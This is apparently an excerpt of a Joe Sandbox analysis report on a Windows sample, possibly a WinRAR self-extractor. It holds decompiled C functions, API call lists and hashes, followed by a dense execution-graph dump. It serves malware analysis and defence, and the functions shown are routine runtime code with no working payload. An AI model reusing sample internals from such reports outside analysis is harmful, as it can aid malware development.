                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: _wcslen
                • String ID: }
                • API String ID: 176396367-4239843852
                • Opcode ID: f861a701f9bb699819c6335624cdb3916b2328afd6382d79b615244fef4ec163
                • Instruction ID: 5a8c22d3cb1a3af8a33e204bab889d8d2f1301b40f45660dc85aa04f0336886f
                • Opcode Fuzzy Hash: f861a701f9bb699819c6335624cdb3916b2328afd6382d79b615244fef4ec163
                • Instruction Fuzzy Hash: 282104729043AA5AD733AA66D841A6BF3ECDF91750F11052AF640C71C1EB64994883B2
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                  • Part of subcall function 003DF2C5: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 003DF2E4
                  • Part of subcall function 003DF2C5: GetProcAddress.KERNEL32(004181C8,CryptUnprotectMemory), ref: 003DF2F4
                • GetCurrentProcessId.KERNEL32(?,?,?,003DF33E), ref: 003DF3D2
                Strings
                • CryptUnprotectMemory failed, xrefs: 003DF3CA
                • CryptProtectMemory failed, xrefs: 003DF389
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: AddressProc$CurrentProcess
                • String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
                • API String ID: 2190909847-396321323
                • Opcode ID: 91813810f2468507c9a074d1e85e32556e8cd084118e321e342e260d8c9f22d3
                • Instruction ID: b5e1b54e632ff007c30e75a2f2bfb7691a5c31f7998237fc9c464359fe43041b
                • Opcode Fuzzy Hash: 91813810f2468507c9a074d1e85e32556e8cd084118e321e342e260d8c9f22d3
                • Instruction Fuzzy Hash: 1B110637A00229AFDF165F20FC85A6E3B58FF04760B12817BFC026B351DB349E418694
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 88%
                			E003DC058(signed short* _a4, intOrPtr _a8) {
                				void* _t3;
                				signed int _t7;
                				intOrPtr _t9;
                				char* _t11;
                				signed short _t14;
                				signed int _t16;
                				signed short* _t18;
                
                				_t18 = _a4;
                				if( *_t18 != 0) {
                					_t9 = _a8;
                					_t16 = 0;
                					do {
                						_t11 = L"?*<>|\"";
                						if(_t9 == 0) {
                							_t11 = L"?*";
                						}
                						_push( *_t18 & 0x0000ffff);
                						_push(_t11);
                						if(E003F22C6(_t11) != 0 || _t9 != 0 &&  *_t18 < 0x20) {
                							_t14 = 0x5f;
                							 *_t18 = _t14;
                						} else {
                							_t14 = 0x5f;
                						}
                						_t7 = _t16 & 0xfffffffe;
                						if(_t7 > 2 &&  *_t18 == 0x3a) {
                							 *_t18 = _t14;
                						}
                						_t18 =  &(_t18[1]);
                						_t16 = _t16 + 2;
                					} while ( *_t18 != 0);
                					return _t7;
                				}
                				return _t3;
                			}











                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: _wcschr
                • String ID: <9@$?*<>|"
                • API String ID: 2691759472-3171408235
                • Opcode ID: 1934aaa2e8a06904d5ff0edd58a555a50ea4fe48e84e67f871b08ea724b2fbd7
                • Instruction ID: 8daff1439189f03433c9bf3c5212df19106509482f0b02597c00bd917d4f4da0
                • Opcode Fuzzy Hash: 1934aaa2e8a06904d5ff0edd58a555a50ea4fe48e84e67f871b08ea724b2fbd7
                • Instruction Fuzzy Hash: 11F0A253574303C1C7321E247801732E3E9EF91320B29581FE5C4973C2EAA5C880C295
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 37%
                			E003EDB4B(intOrPtr _a4) {
                				char _v8;
                				char _v12;
                				char _v4108;
                				void* _t12;
                				void* _t17;
                				void* _t23;
                
                				_t12 = E003EEC50(0x1008);
                				if( *0x41a470 != 0) {
                					_t27 =  *0x41a472;
                					if( *0x41a472 != 0) {
                						E003EC6F0(_t27, 0x41a472,  &_v4108, 0x800);
                						_t17 =  *0x433014(0x80000001, L"Software\\WinRAR SFX", 0, 0, 0, 0x20006, 0,  &_v8,  &_v12, _t23);
                						if(_t17 == 0) {
                							 *0x433020(_v8,  &_v4108, 0, 1, _a4, 2 + E003F3E13(_a4) * 2);
                							_t17 =  *0x433008(_v8);
                						}
                						return _t17;
                					}
                				}
                				return _t12;
                			}










                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: _wcslen
                • String ID: Software\WinRAR SFX$>
                • API String ID: 176396367-2078124420
                • Opcode ID: e13d2962d4d9a115344dd1ba3a5a1449ef3448bf08e736841fbdf6a8012cc6d2
                • Instruction ID: 2492a129ddd01f83fa29f5c65f4ae3e863daccc2e5617e0a9c7f8a2b3cff419c
                • Opcode Fuzzy Hash: e13d2962d4d9a115344dd1ba3a5a1449ef3448bf08e736841fbdf6a8012cc6d2
                • Instruction Fuzzy Hash: 48018F31901168FAEF229F92DC0AFDF7F7CEF04391F004062B509A50A4D7B04A98CBA1
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 69%
                			E003FBB4E(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                				signed int _t15;
                				intOrPtr _t20;
                				signed int _t25;
                				void* _t30;
                				intOrPtr _t32;
                				void* _t33;
                				void* _t38;
                
                				_t28 = __edx;
                				_t23 = __ebx;
                				_push(0xc);
                				_push(0x40c428);
                				E003EF5F0(__ebx, __edi, __esi);
                				_t32 = 0;
                				 *((intOrPtr*)(_t33 - 0x1c)) = 0;
                				_t30 = E003F97E5(__ebx, __ecx, __edx);
                				_t25 =  *0x40eef0; // 0xfffffffe
                				if(( *(_t30 + 0x350) & _t25) == 0 ||  *((intOrPtr*)(_t30 + 0x4c)) == 0) {
                					L5:
                					_t15 = E003FAC31(5);
                					 *((intOrPtr*)(_t33 - 4)) = _t32;
                					_t32 =  *((intOrPtr*)(_t30 + 0x48));
                					 *((intOrPtr*)(_t33 - 0x1c)) = _t32;
                					_t38 = _t32 -  *0x40ee90; // 0x2b62370
                					if(_t38 != 0) {
                						if(_t32 != 0) {
                							asm("lock xadd [esi], eax");
                							if((_t15 | 0xffffffff) == 0 && _t32 != 0x40ec70) {
                								E003F8DCC(_t32);
                							}
                						}
                						_t20 =  *0x40ee90; // 0x2b62370
                						 *((intOrPtr*)(_t30 + 0x48)) = _t20;
                						_t32 =  *0x40ee90; // 0x2b62370
                						 *((intOrPtr*)(_t33 - 0x1c)) = _t32;
                						asm("lock inc dword [esi]");
                					}
                					 *((intOrPtr*)(_t33 - 4)) = 0xfffffffe;
                					E003FBBDF();
                					goto L3;
                				} else {
                					_t32 =  *((intOrPtr*)(_t30 + 0x48));
                					L3:
                					if(_t32 != 0) {
                						return E003EF640(_t32);
                					}
                					E003F8D24(_t23, _t28, _t30, _t32);
                					goto L5;
                				}
                			}











                APIs
                  • Part of subcall function 003F97E5: GetLastError.KERNEL32(?,00411098,003F4674,00411098,?,?,003F40EF,?,?,00411098), ref: 003F97E9
                  • Part of subcall function 003F97E5: _free.LIBCMT ref: 003F981C
                  • Part of subcall function 003F97E5: SetLastError.KERNEL32(00000000,?,00411098), ref: 003F985D
                  • Part of subcall function 003F97E5: _abort.LIBCMT ref: 003F9863
                • _abort.LIBCMT ref: 003FBB80
                • _free.LIBCMT ref: 003FBBB4
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: ErrorLast_abort_free
                • String ID: p@
                • API String ID: 289325740-1482256116
                • Opcode ID: e2a18a1e51b36a7e0bd8dfe0702916b9141c3c0b41a9df45b8c02dcc3be645ae
                • Instruction ID: 2fe825dab8a05c4573fb6073226180ca907dd978e623e3972a1c8667ec270569
                • Opcode Fuzzy Hash: e2a18a1e51b36a7e0bd8dfe0702916b9141c3c0b41a9df45b8c02dcc3be645ae
                • Instruction Fuzzy Hash: BF01A1B1D00A2D9BCB23AF59C40163DF760BF04B20B16061AEA147B291CB756D018BC5
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: Malloc
                • String ID: (>$Z>
                • API String ID: 2696272793-2378772192
                • Opcode ID: 1e1a1b8b263328a9ffdfaa5be179f214f258c4e7aee9ff84d2eeccbd8829646f
                • Instruction ID: 4d24e6d89e06a6032ac592ce7d9fe50581f83ec4a68427c258bee106e82ddd92
                • Opcode Fuzzy Hash: 1e1a1b8b263328a9ffdfaa5be179f214f258c4e7aee9ff84d2eeccbd8829646f
                • Instruction Fuzzy Hash: 7E0146B6600118FFDF069FB1DD49CEEBBBDEF083457000169B906D7160E631AA44DBA4
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E003F8268(void* __eax, void* __ebx, void* __ecx, void* __edx) {
                
                				 *((intOrPtr*)(__ebx + __eax + 0x33)) =  *((intOrPtr*)(__ebx + __eax + 0x33)) + __edx;
                			}




                APIs
                  • Part of subcall function 003FBF30: GetEnvironmentStringsW.KERNEL32 ref: 003FBF39
                  • Part of subcall function 003FBF30: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 003FBF5C
                  • Part of subcall function 003FBF30: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 003FBF82
                  • Part of subcall function 003FBF30: _free.LIBCMT ref: 003FBF95
                  • Part of subcall function 003FBF30: FreeEnvironmentStringsW.KERNEL32(00000000), ref: 003FBFA4
                • _free.LIBCMT ref: 003F82AE
                • _free.LIBCMT ref: 003F82B5
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: _free$ByteCharEnvironmentMultiStringsWide$Free
                • String ID: 0"C
                • API String ID: 400815659-2471324296
                • Opcode ID: 5bbba4942774da12651efd7f4fe6626ec1b499b9a272bba8466946f90b609292
                • Instruction ID: 0da84b1db9b26be7bf7d5b728a0dd813c29983ec2a7f868752edad622df43055
                • Opcode Fuzzy Hash: 5bbba4942774da12651efd7f4fe6626ec1b499b9a272bba8466946f90b609292
                • Instruction Fuzzy Hash: 91E0E53360694A61D76B33396C0267F16044F82338B151A66F7108E1C3CF94880204A6
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 79%
                			E003E0FE4(void* __ecx, void* __ebp, void* _a4) {
                				void* __esi;
                				long _t2;
                				void* _t6;
                
                				_t6 = __ecx;
                				_t2 = WaitForSingleObject(_a4, 0xffffffff);
                				if(_t2 == 0xffffffff) {
                					_push(GetLastError());
                					return E003D6C31(E003D6C36(_t6, 0x411098, L"\nWaitForMultipleObjects error %d, GetLastError %d", 0xffffffff), 0x411098, 0x411098, 2);
                				}
                				return _t2;
                			}







                APIs
                • WaitForSingleObject.KERNEL32(?,000000FF,003E1101,?,?,003E117F,?,?,?,?,?,003E1169), ref: 003E0FEA
                • GetLastError.KERNEL32(?,?,003E117F,?,?,?,?,?,003E1169), ref: 003E0FF6
                  • Part of subcall function 003D6C36: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 003D6C54
                Strings
                • WaitForMultipleObjects error %d, GetLastError %d, xrefs: 003E0FFF
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: ErrorLastObjectSingleWait__vswprintf_c_l
                • String ID: WaitForMultipleObjects error %d, GetLastError %d
                • API String ID: 1091760877-2248577382
                • Opcode ID: 89c0450267ea89ca489d3a028f13e8c1936b9bdb52071cf087227ff2735393af
                • Instruction ID: 887449fe0433152aba57e317a3b2a573d5984f7e8da2d2f7f14ba241ac387542
                • Opcode Fuzzy Hash: 89c0450267ea89ca489d3a028f13e8c1936b9bdb52071cf087227ff2735393af
                • Instruction Fuzzy Hash: E0D02B72A0413076C61137246D06E6E3C088B52332F604726F238752F5CB340D814299
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E003DE29E(void* __ecx) {
                				struct HRSRC__* _t3;
                				void* _t5;
                
                				_t5 = __ecx;
                				_t3 = FindResourceW(GetModuleHandleW(0), L"RTL", 5);
                				if(_t3 != 0) {
                					 *((char*)(_t5 + 0x64)) = 1;
                					return _t3;
                				}
                				return _t3;
                			}






                APIs
                • GetModuleHandleW.KERNEL32(00000000,?,003DDA55,?), ref: 003DE2A3
                • FindResourceW.KERNEL32(00000000,RTL,00000005,?,003DDA55,?), ref: 003DE2B1
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: FindHandleModuleResource
                • String ID: RTL
                • API String ID: 3537982541-834975271
                • Opcode ID: b66154161761d711ec6d3ea3a8eb838aa5d02ded15bd6be150301bbaa4bd8689
                • Instruction ID: 183887d06d6b14ca3a74fb1d2676f97067c37026def48c54070c78d8bd56ed6f
                • Opcode Fuzzy Hash: b66154161761d711ec6d3ea3a8eb838aa5d02ded15bd6be150301bbaa4bd8689
                • Instruction Fuzzy Hash: 9AC0123124171066E6312B657D4DB436E5C5B00B12F050469B581F92D5D6B5C94086A4
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E003EE47A() {
                
                				E003EE85D(0x40c62c, 0x433040);
                				goto __eax;
                			}




                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 003EE467
                  • Part of subcall function 003EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 003EE8D0
                  • Part of subcall function 003EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 003EE8E1
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID: p>$z>
                • API String ID: 1269201914-2390048133
                • Opcode ID: 62c0edf37abc25c4d38b429818c7b81ac9a59c3a98ba044a0841b7e08e416307
                • Instruction ID: 467801053a0d67ea0f42656c7cbf2998fa70944a2c802ba5bd2730eab6bb04aa
                • Opcode Fuzzy Hash: 62c0edf37abc25c4d38b429818c7b81ac9a59c3a98ba044a0841b7e08e416307
                • Instruction Fuzzy Hash: 4AB012E2258090BD750952171D02E3B011CC0C4F11730973FF424D44C2DE4C0E080C36
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E003EE455() {
                
                				E003EE85D(0x40c62c, 0x433044);
                				goto __eax;
                			}



                0x003ee467
                0x003ee46e

                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 003EE467
                  • Part of subcall function 003EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 003EE8D0
                  • Part of subcall function 003EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 003EE8E1
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID: U>$p>
                • API String ID: 1269201914-856557233
                • Opcode ID: a6b6dd75d8340a60e15211e88ca74ecbd7ed1f724682230e1727e90e4b2629dc
                • Instruction ID: 51265c5772aa74c22074c5716e0c1002a1de003ba2208fdfa47cd73ce36745fc
                • Opcode Fuzzy Hash: a6b6dd75d8340a60e15211e88ca74ecbd7ed1f724682230e1727e90e4b2629dc
                • Instruction Fuzzy Hash: 22B012E2258090BD750912131D02C3B021CC0C0F11730D73FF620D44C6DE490E490C36
                Uniqueness

                Uniqueness Score: -1.00%

                Execution Graph

                Execution Coverage:5.5%
                Dynamic/Decrypted Code Coverage:100%
                Signature Coverage:2.5%
                Total number of Nodes:2000
                Total number of Limit Nodes:69
c1a3f9 64642->64645 64649 ba6b12 16 API calls 64643->64649 64646 ba7923 FindCloseChangeNotification 64644->64646 64647 c0d517 15 API calls 64645->64647 64646->64616 64647->64648 64648->64616 64648->64633 64650 c1a2c8 64649->64650 64666 ba6afb SetFilePointerEx SetFilePointerEx SetFilePointerEx 64650->64666 64652 c1a2cf 64652->64613 64653 c0d4bf 4 API calls 64652->64653 64653->64613 64655 c0d52a 64654->64655 64656 c0d58e 64654->64656 64655->64656 64659 c0d52f 64655->64659 64657 c0d4bf 4 API calls 64656->64657 64665 c0d576 64657->64665 64658 c0d558 64672 bbc170 11 API calls 64658->64672 64659->64658 64660 c0d543 64659->64660 64659->64665 64671 bbc170 11 API calls 64660->64671 64663 c0d54b 64668 c0d4fb 64663->64668 64665->64648 64666->64652 64667->64619 64669 c0d4bf 4 API calls 64668->64669 64670 c0d50d 64669->64670 64670->64665 64671->64663 64672->64663 64674 bac269 11 API calls 64673->64674 64675 c2d30e CharUpperBuffW 64674->64675 64676 c2d329 64675->64676 64677 ba8685 11 API calls 64676->64677 64678 c2d347 _wcslen 64677->64678 64678->64030 64679->64100 64680 bbf9b1 64681 bbf9bb 64680->64681 64682 bbf9dc 64680->64682 64687 bac34b 64681->64687 64684 bbf9cb 64685 bac34b 9 API calls 64684->64685 64686 bbf9db 64685->64686 64688 bac359 64687->64688 64689 bac381 messages 64687->64689 64690 bac367 64688->64690 64691 bac34b 9 API calls 64688->64691 64689->64684 64692 bac36d 64690->64692 64693 bac34b 9 API calls 64690->64693 64691->64690 64692->64689 64694 bac780 9 API calls 64692->64694 64693->64692 64694->64689 64695 bf3375 64696 bf425c Sleep 64695->64696 64702 baee60 messages 64696->64702 64697 baf1c1 PeekMessageW 64697->64702 64698 baeeb7 GetInputState 64698->64697 64698->64702 64699 baf085 64700 bf3271 TranslateAcceleratorW 64700->64702 64702->64697 64702->64698 64702->64699 64702->64700 64703 baf23f PeekMessageW 64702->64703 64704 baf223 TranslateMessage DispatchMessageW 64702->64704 64705 baf0b4 timeGetTime 64702->64705 64706 baf25f Sleep 64702->64706 64707 bf4127 
Sleep 64702->64707 64709 bf338d timeGetTime 64702->64709 64721 bf4004 64702->64721 64722 bb02f0 143 API calls 64702->64722 64723 bb2ad0 143 API calls 64702->64723 64724 baf400 64702->64724 64729 baf680 64702->64729 64746 bbf2a5 64702->64746 64751 bbf27e timeGetTime 64702->64751 64753 c14384 11 API calls 64702->64753 64703->64702 64704->64703 64705->64702 64706->64702 64707->64721 64752 bba9e5 12 API calls 64709->64752 64712 bf41be GetExitCodeProcess 64714 bf41ea CloseHandle 64712->64714 64715 bf41d4 WaitForSingleObject 64712->64715 64713 c3331e GetForegroundWindow 64713->64721 64714->64721 64715->64702 64715->64714 64717 bf3cf5 64717->64699 64721->64696 64721->64702 64721->64712 64721->64713 64721->64717 64754 c0f1a7 QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 64721->64754 64755 bbf27e timeGetTime 64721->64755 64722->64702 64723->64702 64725 baf411 64724->64725 64726 baf433 64725->64726 64756 bae910 64725->64756 64728 baf42a 64728->64702 64730 baf6c0 64729->64730 64744 baf78c messages 64730->64744 64789 bc05d2 5 API calls __Init_thread_wait 64730->64789 64734 bf457d 64734->64744 64790 bc0433 22 API calls __onexit 64734->64790 64736 bf45a1 64791 bc0588 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 64736->64791 64739 babe6d 9 API calls 64739->64744 64740 bb02f0 143 API calls 64740->64744 64741 bafa91 64741->64702 64744->64739 64744->64740 64744->64741 64788 bbb2d6 143 API calls 64744->64788 64792 bc05d2 5 API calls __Init_thread_wait 64744->64792 64793 bc0433 22 API calls __onexit 64744->64793 64794 bc0588 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 64744->64794 64795 c25131 38 API calls 64744->64795 64796 c2721e 143 API calls 64744->64796 64747 bbf2b8 64746->64747 64748 bbf2c1 64746->64748 64747->64702 64748->64747 64749 bbf2e5 IsDialogMessageW 64748->64749 64750 bff83b GetClassLongW 64748->64750 64749->64747 64749->64748 64750->64748 64750->64749 64751->64702 64752->64702 64753->64702 
64754->64721 64755->64721 64757 bb02f0 143 API calls 64756->64757 64775 bae94d 64757->64775 64758 bae9bb messages 64758->64728 64759 baea73 64761 baea7e 64759->64761 64762 baed85 64759->64762 64760 baecaf 64764 bf3167 64760->64764 64765 baecc4 64760->64765 64763 bc016b 9 API calls 64761->64763 64762->64758 64770 bc019b 9 API calls 64762->64770 64773 baea85 __fread_nolock 64763->64773 64787 c26062 9 API calls 64764->64787 64768 bc016b 9 API calls 64765->64768 64766 baeb68 64771 bc019b 9 API calls 64766->64771 64777 baeb1a 64768->64777 64769 bc016b 9 API calls 64769->64775 64770->64773 64779 baead9 __fread_nolock messages 64771->64779 64772 bc016b 9 API calls 64774 baeaa6 64772->64774 64773->64772 64773->64774 64774->64779 64780 bad210 64774->64780 64775->64758 64775->64759 64775->64762 64775->64766 64775->64769 64775->64779 64777->64728 64779->64760 64779->64777 64786 ba4485 143 API calls 64779->64786 64781 bad24a 64780->64781 64783 bad276 64780->64783 64782 baf680 143 API calls 64781->64782 64785 bad250 64781->64785 64782->64785 64784 bb02f0 143 API calls 64783->64784 64784->64785 64785->64779 64786->64779 64787->64758 64788->64744 64789->64734 64790->64736 64791->64744 64792->64744 64793->64744 64794->64744 64795->64744 64796->64744 64797 bf55f4 64804 bbe34f 64797->64804 64799 bf560a 64803 bf5685 64799->64803 64813 bba9e5 12 API calls 64799->64813 64801 bf5665 64801->64803 64814 c12393 11 API calls 64801->64814 64805 bbe35d 64804->64805 64806 bbe370 64804->64806 64807 bab3fe 9 API calls 64805->64807 64808 bbe3a3 64806->64808 64809 bbe375 64806->64809 64812 bbe367 64807->64812 64811 bab3fe 9 API calls 64808->64811 64810 bc016b 9 API calls 64809->64810 64810->64812 64811->64812 64812->64799 64813->64801 64814->64803 64815 bb0e6f 64816 bb0e83 64815->64816 64821 bb13d5 64815->64821 64817 bb0e95 64816->64817 64819 bc016b 9 API calls 64816->64819 64818 bab3fe 9 API calls 64817->64818 64820 bb0eee 64817->64820 64833 bb044d messages 64817->64833 64818->64817 64819->64817 
